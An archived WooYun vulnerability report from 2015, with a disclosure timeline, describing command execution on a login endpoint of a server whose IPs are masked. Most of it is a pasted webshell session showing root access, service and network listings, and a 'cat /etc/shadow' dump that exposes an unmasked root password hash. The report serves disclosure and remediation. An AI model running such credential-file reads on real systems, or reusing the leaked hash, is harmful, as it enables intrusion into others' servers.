乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-12: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
同IP服务器的SAP系统**.**.**.**:8080/cpkManage/account/cpkLogin.action存在命令执行漏洞
直接上传木马到服务器
[/apache-tomcat-6.0.26/webapps/cpkManage/cpkManage/]$ whoamiroot/bin/sh: line 0: cd: /apache-tomcat-6.0.26/webapps/cpkManage/cpkManage/: 没有那个文件或目录[/apache-tomcat-6.0.26/bin/]$ chkconfig --listabrt-ccpp 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭abrt-oops 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭abrtd 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭acpid 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭atd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭auditd 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭autofs 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭avahi-daemon 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭certmonger 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭cpuspeed 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭crond 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭cups 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭haldaemon 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭httpd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭hv_kvp_daemon 0:关闭 1:关闭 2:关闭 3:启用 4:关闭 5:启用 6:关闭ip6tables 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭iptables 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭irqbalance 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭kdump 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭lvm2-monitor 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭mdmonitor 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭messagebus 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭mysqld 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭netconsole 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭netfs 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭network 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭nfs 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭nfslock 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭ntpd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭ntpdate 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭oddjobd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭portreserve 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭postfix 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭postgresql 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭psacct 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭quota_nld 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭rdisc 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭restorecond 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭rngd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭rpcbind 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭rpcgssd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭rpcidmapd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭rpcsvcgssd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭rsyslog 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭saslauthd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭smartd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭sshd 0:关闭 1:关闭 2:启用 3:启用 4:启用 5:启用 6:关闭sssd 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭sysstat 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭tomcat6 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭udev-post 0:关闭 1:启用 2:启用 3:启用 4:启用 5:启用 6:关闭ypbind 0:关闭 1:关闭 2:关闭 3:关闭 4:关闭 5:关闭 6:关闭[/apache-tomcat-6.0.26/bin/]$ chkconfig --list atdatd 0:关闭 1:关闭 2:关闭 3:启用 4:启用 5:启用 6:关闭[/apache-tomcat-6.0.26/bin/]$ cat /etc/shadowroot:$6$7IWHBFS8tyjzG918$Gw1fuPXqtZbsnHRgN.FKGD7Pe5620GcRtzxyc83xWbkKFYNMwNJ5HZqM3X3uWLkv6FQ0GfpQMvOqZd4tAIfhz.:16129:0:99999:7:::bin:*:15513:0:99999:7:::daemon:*:15513:0:99999:7:::adm:*:15513:0:99999:7:::lp:*:15513:0:99999:7:::sync:*:15513:0:99999:7:::shutdown:*:15513:0:99999:7:::halt:*:15513:0:99999:7:::mail:*:15513:0:99999:7:::uucp:*:15513:0:99999:7:::operator:*:15513:0:99999:7:::games:*:15513:0:99999:7:::gopher:*:15513:0:99999:7:::ftp:*:15513:0:99999:7:::nobody:*:15513:0:99999:7:::dbus:!!:16129::::::vcsa:!!:16129::::::rpc:!!:16129:0:99999:7:::abrt:!!:16129::::::apache:!!:16129::::::haldaemon:!!:16129::::::ntp:!!:16129::::::saslauth:!!:16129::::::postfix:!!:16129::::::avahi:!!:16129::::::rpcuser:!!:16129::::::nfsnobody:!!:16129::::::tomcat:!!:16129::::::webalizer:!!:16129::::::sshd:!!:16129::::::postgres:!!:16129::::::mysql:!!:16129::::::tcpdump:!!:16129::::::oprofile:!!:16129::::::[/apache-tomcat-6.0.26/bin/]$ ifconfigeth0 Link encap:Ethernet HWaddr 00:15:5D:0A:BA:36 inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::215:5dff:fe0a:ba36/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:58283648 errors:0 dropped:0 overruns:0 frame:0 TX packets:265581 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:5278520920 (4.9 GiB) TX bytes:265824359 (253.5 MiB)eth1 Link encap:Ethernet HWaddr 00:15:5D:0A:BA:37 inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.** inet6 addr: fe80::215:5dff:fe0a:ba37/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:59033471 errors:0 dropped:0 overruns:0 frame:0 TX packets:123015 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:5194826281 (4.8 GiB) TX bytes:83206472 (79.3 MiB)lo Link encap:Local Loopback inet addr:**.**.**.** Mask:**.**.**.** inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:145264 errors:0 dropped:0 overruns:0 frame:0 TX packets:145264 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:12406620 (11.8 MiB) TX bytes:12406620 (11.8 MiB)[/apache-tomcat-6.0.26/bin/]$ cat /etc/resolv.confcat: /etc/resolv.conf: 没有那个文件或目录[/apache-tomcat-6.0.26/bin/]$ bash prompt:bash: prompt:: 没有那个文件或目录[/apache-tomcat-6.0.26/bin/]$ lsb_release -aLSB Version: :core-4.0-amd64:core-4.0-noarch:graphics-4.0-amd64:graphics-4.0-noarch:printing-4.0-amd64:printing-4.0-noarchDistributor ID: CentOSDescription: CentOS release 6.3 (Final)Release: 6.3Codename: Final[/apache-tomcat-6.0.26/bin/]$ netstat /nausage: netstat [-veenNcCF] [<Af>] -r netstat {-V|--version|-h|--help} netstat [-vnNcaeol] [<Socket> ...] netstat { [-veenNac] -I[<Iface>] | [-veenNac] -i | [-cnNe] -M | -s } [delay] -r, --route display routing table -I, --interfaces=<Iface> display interface table for <Iface> -i, --interfaces display interface table -g, --groups display multicast group memberships -s, --statistics display networking statistics (like SNMP) -M, --masquerade display masqueraded connections -v, --verbose be verbose -n, --numeric don't resolve names --numeric-hosts don't resolve host names --numeric-ports don't resolve port names --numeric-users don't resolve user names -N, --symbolic resolve hardware names -e, --extend display other/more information -p, --programs display PID/Program name for sockets -c, --continuous continuous listing -l, --listening display listening server sockets -a, --all, --listening display all sockets (default: connected) -o, --timers display timers -F, --fib display Forwarding Information Base (default) -C, --cache display routing cache instead of FIB -T, --notrim stop trimming long addresses -Z, --context display SELinux security context for sockets <Iface>: Name of interface to monitor/list. <Socket>={-t|--tcp} {-u|--udp} {-S|--sctp} {-w|--raw} {-x|--unix} --ax25 --ipx --netrom <AF>=Use '-A <af>' or '--<af>'; default: inet List of possible address families (which support routing): inet (DARPA Internet) inet6 (IPv6) ax25 (AMPR AX.25) netrom (AMPR NET/ROM) ipx (Novell IPX) ddp (Appletalk DDP) x25 (CCITT X.25) [/apache-tomcat-6.0.26/bin/]$ netstat -anActive Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 **.**.**.**:45734 **.**.**.**:* LISTEN tcp 0 0 **.**.**.**:3306 **.**.**.**:* LISTEN tcp 0 0 **.**.**.**:111 **.**.**.**:* LISTEN tcp 0 0 **.**.**.**:22 **.**.**.**:* LISTEN tcp 0 0 **.**.**.**:631 **.**.**.**:* LISTEN tcp 0 0 **.**.**.**:25 **.**.**.**:* LISTEN tcp 0 0 **.**.**.**:3306 **.**.**.**:57872 ESTABLISHED tcp 0 0 **.**.**.**:3306 **.**.**.**:57873 ESTABLISHED tcp 0 0 **.**.**.**:3306 **.**.**.**:57874 ESTABLISHED tcp 0 0 ::ffff:**.**.**.**:8005 :::* LISTEN tcp 0 0 :::8009 :::* LISTEN tcp 0 0 :::37869 :::* LISTEN tcp 0 0 :::111 :::* LISTEN tcp 0 0 :::8080 :::* LISTEN tcp 0 0 :::22 :::* LISTEN tcp 0 0 ::1:631 :::* LISTEN tcp 0 0 ::1:25 :::* LISTEN tcp 0 0 ::ffff:**.**.**.**:57874 ::ffff:**.**.**.**:3306 ESTABLISHED tcp 0 0 ::ffff:**.**.**.**:8080 ::ffff:**.**.**.**:7836 ESTABLISHED tcp 0 0 ::ffff:**.**.**.**:57872 ::ffff:**.**.**.**:3306 ESTABLISHED tcp 0 0 ::ffff:**.**.**.**:57873 ::ffff:**.**.**.**:3306 ESTABLISHED udp 0 0 **.**.**.**:604 **.**.**.**:* udp 0 0 **.**.**.**:5353 **.**.**.**:* udp 0 0 **.**.**.**:111 **.**.**.**:* udp 0 0 **.**.**.**:1008 **.**.**.**:* udp 0 0 **.**.**.**:55414 **.**.**.**:* udp 0 0 **.**.**.**:631 **.**.**.**:* udp 0 0 **.**.**.**:51767 **.**.**.**:* udp 0 0 :::53083 :::* udp 0 0 :::111 :::* udp 0 0 :::1008 :::* Active UNIX domain sockets (servers and established)Proto RefCnt Flags Type State I-Node Pathunix 2 [ ACC ] STREAM LISTENING 13638 /var/run/abrt/abrt.socketunix 2 [ ACC ] STREAM LISTENING 9007 @/com/ubuntu/upstartunix 2 [ ACC ] STREAM LISTENING 12692 @/var/run/hald/dbus-yn83NJrxSEunix 2 [ ACC ] STREAM LISTENING 12571 /var/run/cups/cups.sockunix 2 [ ] DGRAM 9209 @/org/kernel/udev/udevdunix 2 [ ACC ] STREAM LISTENING 11909 /var/run/rpcbind.sockunix 2 [ ACC ] STREAM LISTENING 13479 public/cleanupunix 2 [ ACC ] STREAM LISTENING 13486 private/tlsmgrunix 2 [ ACC ] STREAM LISTENING 13490 private/rewriteunix 2 [ ACC ] STREAM LISTENING 13494 private/bounceunix 2 [ ACC ] STREAM LISTENING 13498 private/deferunix 2 [ ACC ] STREAM LISTENING 13502 private/traceunix 2 [ ACC ] STREAM LISTENING 13506 private/verifyunix 2 [ ACC ] STREAM LISTENING 13510 public/flushunix 2 [ ACC ] STREAM LISTENING 13514 private/proxymapunix 2 [ ACC ] STREAM LISTENING 13518 private/proxywriteunix 2 [ ACC ] STREAM LISTENING 13522 private/smtpunix 2 [ ACC ] STREAM LISTENING 13526 private/relayunix 2 [ ACC ] STREAM LISTENING 13530 public/showqunix 2 [ ACC ] STREAM LISTENING 13534 private/errorunix 2 [ ACC ] STREAM LISTENING 13538 private/retryunix 2 [ ACC ] STREAM LISTENING 13542 private/discardunix 2 [ ACC ] STREAM LISTENING 13546 private/localunix 2 [ ACC ] STREAM LISTENING 13550 private/virtualunix 2 [ ACC ] STREAM LISTENING 13554 private/lmtpunix 2 [ ACC ] STREAM LISTENING 13558 private/anvilunix 2 [ ACC ] STREAM LISTENING 13562 private/scacheunix 2 [ ] DGRAM 12714 @/org/freedesktop/hal/udev_eventunix 2 [ ACC ] STREAM LISTENING 12455 /var/run/dbus/system_bus_socketunix 2 [ ACC ] STREAM LISTENING 12522 /var/run/avahi-daemon/socketunix 2 [ ACC ] STREAM LISTENING 12649 /var/run/acpid.socketunix 2 [ ACC ] STREAM LISTENING 13259 /var/lib/mysql/mysql.sockunix 13 [ ] DGRAM 11699 /dev/logunix 2 [ ACC ] STREAM LISTENING 12685 @/var/run/hald/dbus-2qGfjVmQG0unix 2 [ ] DGRAM 177002 unix 3 [ ] STREAM CONNECTED 15263 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 15262 unix 3 [ ] STREAM CONNECTED 15225 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 15224 unix 3 [ ] STREAM CONNECTED 15209 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 15208 unix 3 [ ] STREAM CONNECTED 14733 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 14732 unix 3 [ ] STREAM CONNECTED 13990 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 13989 unix 2 [ ] DGRAM 13733 unix 2 [ ] DGRAM 13720 unix 2 [ ] DGRAM 13640 unix 2 [ ] DGRAM 13572 unix 3 [ ] STREAM CONNECTED 13565 unix 3 [ ] STREAM CONNECTED 13564 unix 3 [ ] STREAM CONNECTED 13561 unix 3 [ ] STREAM CONNECTED 13560 unix 3 [ ] STREAM CONNECTED 13557 unix 3 [ ] STREAM CONNECTED 13556 unix 3 [ ] STREAM CONNECTED 13553 unix 3 [ ] STREAM CONNECTED 13552 unix 3 [ ] STREAM CONNECTED 13549 unix 3 [ ] STREAM CONNECTED 13548 unix 3 [ ] STREAM CONNECTED 13545 unix 3 [ ] STREAM CONNECTED 13544 unix 3 [ ] STREAM CONNECTED 13541 unix 3 [ ] STREAM CONNECTED 13540 unix 3 [ ] STREAM CONNECTED 13537 unix 3 [ ] STREAM CONNECTED 13536 unix 3 [ ] STREAM CONNECTED 13533 unix 3 [ ] STREAM CONNECTED 13532 unix 3 [ ] STREAM CONNECTED 13529 unix 3 [ ] STREAM CONNECTED 13528 unix 3 [ ] STREAM CONNECTED 13525 unix 3 [ ] STREAM CONNECTED 13524 unix 3 [ ] STREAM CONNECTED 13521 unix 3 [ ] STREAM CONNECTED 13520 unix 3 [ ] STREAM CONNECTED 13517 unix 3 [ ] STREAM CONNECTED 13516 unix 3 [ ] STREAM CONNECTED 13513 unix 3 [ ] STREAM CONNECTED 13512 unix 3 [ ] STREAM CONNECTED 13509 unix 3 [ ] STREAM CONNECTED 13508 unix 3 [ ] STREAM CONNECTED 13505 unix 3 [ ] STREAM CONNECTED 13504 unix 3 [ ] STREAM CONNECTED 13501 unix 3 [ ] STREAM CONNECTED 13500 unix 3 [ ] STREAM CONNECTED 13497 unix 3 [ ] STREAM CONNECTED 13496 unix 3 [ ] STREAM CONNECTED 13493 unix 3 [ ] STREAM CONNECTED 13492 unix 3 [ ] STREAM CONNECTED 13489 unix 3 [ ] STREAM CONNECTED 13488 unix 3 [ ] STREAM CONNECTED 13485 unix 3 [ ] STREAM CONNECTED 13484 unix 3 [ ] STREAM CONNECTED 13482 unix 3 [ ] STREAM CONNECTED 13481 unix 3 [ ] STREAM CONNECTED 13476 unix 3 [ ] STREAM CONNECTED 13475 unix 3 [ ] STREAM CONNECTED 13473 unix 3 [ ] STREAM CONNECTED 13472 unix 2 [ ] DGRAM 13422 unix 2 [ ] DGRAM 13095 unix 2 [ ] DGRAM 13004 unix 3 [ ] STREAM CONNECTED 12924 /var/run/acpid.socketunix 3 [ ] STREAM CONNECTED 12923 unix 3 [ ] STREAM CONNECTED 12918 @/var/run/hald/dbus-2qGfjVmQG0unix 3 [ ] STREAM CONNECTED 12917 unix 3 [ ] STREAM CONNECTED 12878 @/var/run/hald/dbus-2qGfjVmQG0unix 3 [ ] STREAM CONNECTED 12809 unix 3 [ ] STREAM CONNECTED 12709 @/var/run/hald/dbus-yn83NJrxSEunix 3 [ ] STREAM CONNECTED 12708 unix 3 [ ] STREAM CONNECTED 12687 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 12686 unix 2 [ ] DGRAM 12653 unix 3 [ ] STREAM CONNECTED 12525 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 12524 unix 3 [ ] STREAM CONNECTED 12519 unix 3 [ ] STREAM CONNECTED 12518 unix 2 [ ] DGRAM 12515 unix 3 [ ] STREAM CONNECTED 12475 /var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 12474 unix 3 [ ] STREAM CONNECTED 12469 unix 3 [ ] STREAM CONNECTED 12468 unix 3 [ ] STREAM CONNECTED 12287 unix 3 [ ] STREAM CONNECTED 12286 unix 2 [ ] DGRAM 12005 unix 3 [ ] DGRAM 9226 unix 3 [ ] DGRAM 9225 [/apache-tomcat-6.0.26/bin/]$
加强安全意识
危害等级:高
漏洞Rank:12
确认时间:2015-11-24 09:36
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给辽宁分中心,由辽宁分中心后续协调网站管理单位处置。
暂无
